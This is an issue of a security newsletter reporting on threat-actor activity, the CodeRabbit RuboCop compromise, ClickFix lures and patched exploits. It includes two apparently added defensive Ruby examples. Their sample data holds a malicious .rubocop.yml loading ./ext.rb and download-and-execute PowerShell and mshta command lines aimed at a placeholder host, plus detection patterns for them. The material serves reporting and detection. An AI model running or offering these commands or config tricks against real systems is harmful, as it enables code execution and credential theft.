🎓️ Vulnerable U | #130

Scattered Spider, ShinyHunters and Lapsus$ joining forces; some of them getting arrested and their Telegram chats getting popped. Apple patches a 0-day under active exploitation, and much more!

Read Time: 5 minutes


Howdy friends!

Hey guys, good week here in Texas, back to the routine post-Vegas black hole. Feels good to be back in the gym. Feels good to get a bunch of stuff done with a cup filled after seeing the great energy of the community at those couple conferences.

No sponsor in this week's newsletter, brought to you by myself! And the launch of VulnU Premium. Thank you to the couple of handfuls of you that have signed up so far, even without any premium content on the other side of that paywall. But now that's no longer true!

We sent out the first edition of VulnU Premium this week. Huge thanks to my good friend RSnake for doing the inaugural interview. It's really a great one, it's a home run, couldn't have asked for a better first interview.

Here I recorded a quick video, which I'm going to do for every edition of VulnU Premium as an intro to what we're doing over here. I'm not going to include these in the free version of the newsletter moving forward, but I wanted you guys to hear in my own words what I'm working on behind the scenes.

Sneak peek at VulnU Premium this week: a snippet from an interview where we get into some serious life and mental challenges in some very successful infosec leaders' lives. You're not alone, whatever you're going through:

Second worst was losing SecTheory and the worst was James Flom's death. Kinda rocked my entire world. Honestly, a lot has gone wrong for me to get here.

Picture me on Wall Street the week of the subprime mortgage crisis talking with my client who is just looking around the room and pointing to all the companies who were going out of business. I’m thinking, holy crap. Because they’re my client, my next question to them was, “and how about you?” They simply said, “Well, I'll tell you this much. We're not going to be buying your service for quite a while.”

Then that's what happened. We had about six months of cash reserves, which is about what you'd expect for a small consultancy. We needed at least a year and we did not have a year's worth of money. So I ended up having to fire everyone in the company other than him, other than James.

ICYMI

🖊️ Something I wrote: Famous indie hacker, levelsio, put out a decent list of securing your environment for vibe coders and the like. I wanted to crowdsource some extra advice in this thread.

🎧️ Something I heard: This video about the Claude Code workflow is being passed around by a lot of people I trust, who are saying that if you listen to it, it's game changing for you. (This isn't just about coding.)

🎤 Something I said: Did this awesome interview with one of the heads of Microsoft Threat Intel, Sherrod DeGrippo

🔖 Something I read: I'm Worried It Might Get Really Bad - My good homie Daniel Miessler laying out some seriously worrying thoughts about the state of things and the future.

Vulnerable News

Fun one. Fun conversation it brings up about whether clickjacking is worth fixing given the usability hit. I'm not losing sleep over it, but it's worth talking about:

Turns out video game anti-cheat systems are basically cybersecurity boot camp on steroids. Researchers from University of Birmingham dropped some interesting findings at Black Hat about how gaming companies are dealing with cheaters, and honestly, they're moving way faster than traditional cybersecurity. Anti-cheat updates that get countered within hours, versus the glacial pace of malware/antivirus cycles. These gaming defenders are spotting vulnerable drivers used in ransomware attacks a full year before mainstream security catches on.

The economics are wild too - even the best anti-cheat systems only block cheating about 50% of the time, but they're pricing people out with $200 monthly subscriptions for premium cheats. There's a whole underground economy here, from casual $100 aimbots to subtle competitive advantages for esports match-fixing. The researchers make a compelling case that cybersecurity folks should be studying this space more closely, especially since cheat development can actually be more profitable than legitimate bug bounties. Who knew Mario Kart could teach us about threat hunting? (read more)

Interesting thread on this topic. I like LowLevel's take here; he even summoned Notch.

Workday just got social engineered by what looks like the ShinyHunters crew, who've been on a tear hitting companies through their Salesforce instances. The attackers called up Workday employees pretending to be from HR, convinced someone to hand over access, and managed to swipe business contact info from their third-party CRM system. No customer data got touched, just the usual names, emails, and phone numbers that'll probably fuel their next round of social engineering campaigns. (read more)

Way more interesting than the actual Workday/Salesforce breach is this MO shift from ShinyHunters: they're looking a lot more like Scattered Spider. Their Telegram groups are getting popped and shutting down. Super interesting merger of threat actors. I wonder if it has anything to do with some of them getting arrested.

Obsidian researchers are tracking what appears to be ShinyHunters and Scattered Spider joining forces, evidenced by a massive wave of Salesforce attacks that hit Google, Qantas, LVMH, and dozens of other companies. The attack was straight out of Scattered Spider’s latest playbook - voice phishing calls pretending to be IT support, tricking employees into authorizing malicious OAuth apps that then hoovered up CRM data via Salesforce APIs.

The attribution got messy when ShinyHunters' alleged leader straight-up told DataBreaches.net they were working with Scattered Spider, despite security firms tracking them as separate groups (UNC6040, UNC6240, UNC3944). Adding to the chaos, Telegram channels started popping up conflating ShinyHunters, Scattered Spider, and even Lapsus$ into one big happy criminal family. The channels have been a wild ride of exploit sharing, data leak teasers, and threats against security companies before getting nuked and reappearing under new names. Bottom line: these groups are evolving and potentially consolidating, making attribution harder but the threat very real. (read more)

Speaking of them going to jail…

A 20-year-old Scattered Spider member just got hit harder than expected in court. Noah Michael Urban was looking at eight years, but the judge said "nope" and gave him 10, plus $13 million in restitution to over 30 victims. The FBI seized nearly $3 million in crypto from his computer when they raided his place last year, and he admitted the whole stash came from his Scattered Spider work.

Urban and his crew were doing the classic SIM swap and SMS phishing routine to steal crypto and corporate docs between 2022 and 2023. These are the same folks behind the MGM casino ransomware hit in 2023. If you follow me you know this, but if you're new here: they laid low for a bit and came back swinging this year, going after airlines, insurance companies, and major retailers from March to the present day. (read more)

Here's a fun one from Kudelski Security on how they completely owned CodeRabbit, that popular AI code review tool. Turns out CodeRabbit runs external linters like RuboCop on your PR changes, and RuboCop has this neat feature where its config file can tell it to load arbitrary Ruby extensions. (What year is it?!)

So they crafted a malicious PR with a .rubocop.yml config that loaded their own ext.rb file, which promptly exfiltrated all the environment variables from CodeRabbit's production servers when the linter ran.

The haul was absolutely bonkers: Anthropic API keys, OpenAI keys, database credentials, and most importantly, CodeRabbit's GitHub App private key. That private key essentially gave them read/write access to the 1 million repositories using CodeRabbit, including private repos. They could've cloned private code, modified git history, or replaced releases with malware for a massive supply chain attack. (read more)
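The lesson for anyone running linters on untrusted pull requests is that RuboCop's config file is not inert data: its `require:` key loads Ruby (a gem name or a relative path such as `./ext.rb`), and `inherit_from:` can pull configuration from an http(s) URL. Below is an added example, not CodeRabbit's or Kudelski's code, that screens a PR-supplied .rubocop.yml for those keys and produces a stripped copy safe to pass to `rubocop --config`. The extension allowlist and the sample config are constructed for the example.

```ruby
require "yaml"

# Added example: screen a .rubocop.yml taken from an untrusted pull request
# before a CI/review service runs RuboCop on it. RuboCop's `require:` entries
# are loaded as Ruby code (relative paths are plain code execution), and
# `inherit_from:` may point at a remote URL. Neither should be attacker-controlled.
# The allowlist of extension gems is an assumption made for this example.
ALLOWED_RUBOCOP_EXTENSIONS = %w[rubocop-performance rubocop-rails rubocop-rspec].freeze

REMOTE_SOURCE = %r{\Ahttps?://}i

def load_config(yaml_text)
  cfg = YAML.safe_load(yaml_text) || {}
  cfg.is_a?(Hash) ? cfg : {}
end

# Returns "key: value" strings for every entry that should block the run.
def unsafe_rubocop_entries(yaml_text)
  cfg = load_config(yaml_text)
  findings = []
  Array(cfg["require"]).each do |name|
    findings << "require: #{name}" unless ALLOWED_RUBOCOP_EXTENSIONS.include?(name.to_s)
  end
  Array(cfg["inherit_from"]).each do |src|
    findings << "inherit_from: #{src}" if src.to_s.match?(REMOTE_SOURCE)
  end
  findings
end

# Returns a copy of the config with the code-loading keys removed, so the PR's
# cop settings are honoured but nothing it ships is ever `require`d.
def strip_code_loading_keys(yaml_text)
  cfg = load_config(yaml_text)
  cfg.delete("require")
  local_only = Array(cfg["inherit_from"]).reject { |s| s.to_s.match?(REMOTE_SOURCE) }
  if local_only.empty?
    cfg.delete("inherit_from")
  else
    cfg["inherit_from"] = local_only
  end
  YAML.dump(cfg)
end

# Constructed sample of what a malicious PR could carry (the ./ext.rb name
# mirrors the write-up; the URL is a placeholder).
MALICIOUS_RUBOCOP_YML = <<~YAML
  require:
    - rubocop-rails
    - ./ext.rb
  inherit_from: https://example.invalid/shared.yml
  AllCops:
    NewCops: enable
YAML

if $PROGRAM_NAME == __FILE__
  unsafe_rubocop_entries(MALICIOUS_RUBOCOP_YML).each { |f| warn "blocked: #{f}" }
  puts strip_code_loading_keys(MALICIOUS_RUBOCOP_YML)
end
```

Config filtering is a denylist and only covers the keys we know about; the durable fix is to run third-party linters in a throwaway sandbox that holds no production secrets at all, so that a successful code-execution trick yields nothing worth exfiltrating.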

Arizona Congressman David Schweikert wants to bring back an old-school tactic for modern problems - letters of marque for cyber privateers. His "Scam Farms Marque and Reprisal Authorization Act" would let the President commission white hat hackers to go after foreign cybercriminals and seize their assets. We're talking about the same legal framework that created privateers back in the War of 1812, except now they'd be hunting scammers instead of British ships.

The bill gives pretty broad authority - no limits on how many cyber privateers could be commissioned, and they'd be authorized to target anyone from criminal enterprises to foreign governments involved in cyber attacks. Schweikert's pointing to the $16.6 billion Americans lost to scams last year as proof that current approaches aren't cutting it. His team also frames this as a human rights issue, noting how people in places like Myanmar and China are being trafficked and forced into scammer roles. Whether Congress will actually greenlight government-sanctioned hacker crews remains to be seen, but it's certainly a creative approach to the cybercrime problem. (read more)

Every blue teamer I know is currently dealing with a ClickFix incident. This is a great post out of Microsoft analyzing the whole thing; this technique is everywhere right now.

Thanks to Microsoft's threat intel team for the comprehensive breakdown of the "ClickFix" social engineering technique. This attack tricks users into running malicious commands by presenting fake error messages, CAPTCHA checks, or verification prompts that look legit. It tells users to "fix" the issue by copying and pasting commands into the Windows Run dialog, Terminal, or PowerShell. Behind the scenes, it's delivering nasty payloads like Lumma Stealer, various RATs, and even rootkits to thousands of devices daily.

The technique arrives via phishing emails, malvertising, and compromised sites, often impersonating trusted brands like Cloudflare, Google, or even government agencies like the SSA. Microsoft's seeing ClickFix builders selling on forums for anywhere from $200 to $1500 per month, complete with anti-detection guarantees. The attack has even expanded to macOS users with campaigns delivering Atomic macOS Stealer.

This is a good one to share to people who need to defend themselves from this attack. (read more)
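The defensive angle that follows from the description above: the pasted command runs as a child of whatever the user pasted it into, so on Windows the Run dialog and Terminal path shows up as explorer.exe spawning powershell, mshta, cmd or curl with download-and-execute switches. The following is an added example (mine, not Microsoft's detection logic) of that hunt run over a few constructed process-creation events; the flattened key="value" line format and the file paths are assumptions, not any vendor's real schema.

```ruby
# Added example: flag ClickFix-shaped process launches in constructed
# process-creation events. Shape being hunted: an interactive shell parent
# (Run dialog lives under explorer.exe) spawning a scripting/download tool
# whose command line fetches and executes remote content.
LURE_PARENTS  = %w[explorer.exe windowsterminal.exe].freeze
LURE_CHILDREN = %w[powershell.exe pwsh.exe mshta.exe cmd.exe curl.exe certutil.exe].freeze
LURE_PATTERNS = [
  /-(enc|encodedcommand|e)\s+[A-Za-z0-9+\/=]{20,}/i, # base64-encoded PowerShell
  /\biex\b|invoke-expression/i,                       # execute text fetched at runtime
  /downloadstring|invoke-webrequest|\biwr\b/i,
  /mshta\s+https?:/i,                                 # HTA pulled straight from the web
  /-w(indowstyle)?\s+hidden/i,
  /curl\b.*\|\s*(bash|sh|cmd|powershell)/i           # macOS/Linux variant of the lure
].freeze

Event = Struct.new(:image, :parent, :cmdline)

# Last path component, tolerant of Windows backslashes on any host OS.
def basename_any_os(path)
  path.to_s.split(/[\\\/]/).last.to_s.downcase
end

def parse_event(line)
  fields = line.scan(/(\w+)="([^"]*)"/).to_h
  Event.new(basename_any_os(fields["Image"]),
            basename_any_os(fields["ParentImage"]),
            fields["CommandLine"].to_s)
end

def clickfix_like?(ev)
  LURE_PARENTS.include?(ev.parent) &&
    LURE_CHILDREN.include?(ev.image) &&
    LURE_PATTERNS.any? { |re| ev.cmdline.match?(re) }
end

def hunt(log)
  log.lines.map(&:strip).reject(&:empty?).map { |l| parse_event(l) }.select { |e| clickfix_like?(e) }
end

# Constructed events: two ClickFix-style launches, one benign script run from
# the Run dialog, one PowerShell launch from a non-interactive parent.
SAMPLE_EVENTS = <<~'LOG'
  Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -w hidden -c iex (iwr 'http://example.invalid/verify.txt')"
  Image="C:\Windows\System32\mshta.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="mshta https://example.invalid/captcha.hta"
  Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -File C:\Users\dev\scripts\build.ps1"
  Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Git\usr\bin\bash.exe" CommandLine="powershell -NoProfile -Command Get-Date"
LOG

if $PROGRAM_NAME == __FILE__
  hunt(SAMPLE_EVENTS).each { |e| puts "suspect: #{e.parent} -> #{e.image}: #{e.cmdline}" }
end
```

The parent filter keeps this rule tight to the paste-into-Run-dialog path; drop it if you want the same command-line patterns surfaced regardless of parent, at the cost of more noise from legitimate admin scripting.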

SAP is everywhere so these headlines are attention grabbing for me. Someone dropped an exploit on Telegram that chains together two critical flaws in SAP NetWeaver Visual Composer (CVE-2025-31324 and CVE-2025-42999) for what researchers are calling a "one-two punch" attack. The first vulnerability bypasses authentication to get malicious payloads onto the server, then the second one deserializes and executes the code with SAP system privileges.

The exploit supposedly came from channels linked to Scattered Spider, ShinyHunters, and LAPSUS$, and VX-Underground shared it publicly last week. If you're running unpatched SAP systems, this combo can lead to complete system takeover and remote code execution. The good news is patches have been available for a while - if you've applied SAP Security Notes 3594142 and 3604119, you're good to go. But if not, might want to get on that before someone decides to test this "devastating" attack chain on your infrastructure. (read more)

Orange Belgium just had 850,000 customers' data swiped in a breach that happened back in July. Full names, phone numbers, SIM card numbers, and PUK codes - basically everything you'd need to run convincing targeted phishing campaigns. Orange is downplaying this, claiming "no critical data was compromised" since passwords and financial info stayed safe, but security experts are calling BS on that assessment.

The real concern here is how this data combo creates a perfect storm for fraud. Having real names tied to phone numbers makes phishing attempts way more believable, and there's serious worry about high-risk individuals like domestic violence victims or politicians who might now need to change their numbers entirely. Orange insists there's no SIM-swapping risk and says they've beefed up their security checks. What do you think about this one and this kind of breach? (read more)

Short but figured it was important to point out: “The data shows that U.S. Customs and Border Protection, the agency tasked with immigration screening at the U.S. border, searched 14,899 devices of international travelers between April through June, a 17% rise on the previous record high recorded in early 2022.” (read more)

TLDR: Hit update on every single Apple device. This one they're saying is actively exploited and patched in the most recent wave of updates.

The emergency patch is for CVE-2025-43300, an out-of-bounds write bug in the Image I/O framework: attackers can craft malicious images that corrupt memory and potentially execute code. Apple's calling the attacks "extremely sophisticated" and targeted at specific individuals, which usually means state-sponsored shenanigans rather than mass exploitation. (read more)

A 22-year-old from Oregon got nabbed for running "Rapper Bot," a Mirai-based DDoS-for-hire service that was just taken down in Operation PowerOff. The botnet infected 45,000+ DVRs and routers across 39 countries, launching a whopping 370,000 attacks since April 2025. We're talking serious firepower here - 2 to 6 Tbps attacks that could cost victims up to $10k for just 30 seconds of downtime.

Ethan Foltz allegedly rented out this beast to target everything from government systems to gaming companies, and even added cryptomining to squeeze more profit from compromised devices. AWS helped trace the C2 infrastructure, leading to the August 6 raid. While Foltz is looking at up to 10 years if convicted, he's currently walking free on a summons. The botnet's been quiet since the takedown, suggesting this might actually be the end of Rapper Bot's tour. (read more)

Bragg Gaming Group got hit with a breach over the weekend - they're saying hackers got into their internal systems but operations weren't affected. Pretty light on details at this point, which usually means they're still figuring out what happened. Given they provide gaming tech to casinos and betting platforms, this is one to watch - especially since gambling companies have been prime targets lately for their combo of financial data and infrastructure. (read more)

Another crypto bro bites the dust - Charles Parks III (aka "CP3O") just got sentenced to a year in prison for running a $3.5M cryptojacking operation using stolen cloud computing resources. Parks created shell companies like "MultiMillionaire LLC" (subtle, right?) to scam cloud providers in Seattle and Redmond (looking at you AWS and Azure) into providing massive computing power for mining Monero, ETH, and Litecoin.

The best part? While racking up millions in unpaid cloud bills, he told providers he was building "a global online training company" for 10,000 students. Classic. He managed to mine about $1M worth of crypto before getting caught, laundering it through NFT marketplaces and crypto exchanges to buy a Mercedes AMG and other luxuries. The cherry on top was his YouTube channel where he gave tips on achieving a "MultiMillionaire Mentality" - turns out step 1 was fraud. The US Attorney summed it up perfectly: he branded himself as an innovator but was "merely a fraudster whose secret to getting rich quick was lying and stealing." (read more)

Miscellaneous mattjay

How'd I do this edition?

It's hard doing this in a vacuum. Screaming into a void. Feedback is incredibly valuable to make sure I'm making a newsletter you love getting every week.


Parting Thoughts:

Community was foundational in launching and propelling my career. Community is the only reason I can stand being in Texas during the summer months. Community is the point. Today, I invite you to embrace discomfort on the road to a more vulnerable you.

Stay safe, Matt Johansen
@mattjay